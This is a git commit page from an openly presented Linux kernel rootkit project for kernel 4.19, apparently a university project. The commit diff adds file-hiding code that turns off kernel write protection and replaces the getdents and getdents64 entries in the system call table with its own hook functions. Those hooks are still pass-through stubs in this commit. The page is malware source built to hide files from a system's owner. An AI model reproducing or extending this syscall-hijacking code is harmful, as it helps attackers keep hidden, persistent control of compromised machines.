linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 65f046cb1484a53d0406eeb5c5d1b91a1e0a15cb
parent c0f6c3f9d116a5e13d53b219404f856d663cea4b
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 21 Nov 2020 15:30:18 +0100

refactors code

Diffstat:

Msrc/filehide.c | 8++++++--


Msrc/hook.c | 4++--


2 files changed, 8 insertions(+), 4 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -4,25 +4,29 @@
 long
 g7_getdents(unsigned fd, struct linux_dirent __user *dirp, unsigned count)
 {
-
+    return sys_getdents(fd, dirp, count);
 }
 
 long
 g7_getdents64(unsigned fd, struct linux_dirent64 __user *dirp, unsigned count)
 {
-
+    return sys_getdents64(fd, dirp, count);
 }
 
 void
 hide_files(void)
 {
+    disable_protection();
     sys_call_table[__NR_getdents] = (long *)g7_getdents;
     sys_call_table[__NR_getdents64] = (long *)g7_getdents64;
+    enable_protection();
 }
 
 void
 unhide_files(void)
 {
+    disable_protection();
     sys_call_table[__NR_getdents] = (long *)sys_getdents;
     sys_call_table[__NR_getdents64] = (long *)sys_getdents64;
+    enable_protection();
 }
diff --git a/src/hook.c b/src/hook.c
@@ -21,8 +21,8 @@ init_hooks(void)
 {
     disable_protection();
 
-	sys_getdents = (void *)sys_call_table[__NR_getdents];
-	sys_getdents64 = (void *)sys_call_table[__NR_getdents64];
+    sys_getdents = (void *)sys_call_table[__NR_getdents];
+    sys_getdents64 = (void *)sys_call_table[__NR_getdents64];
 
     enable_protection();
 }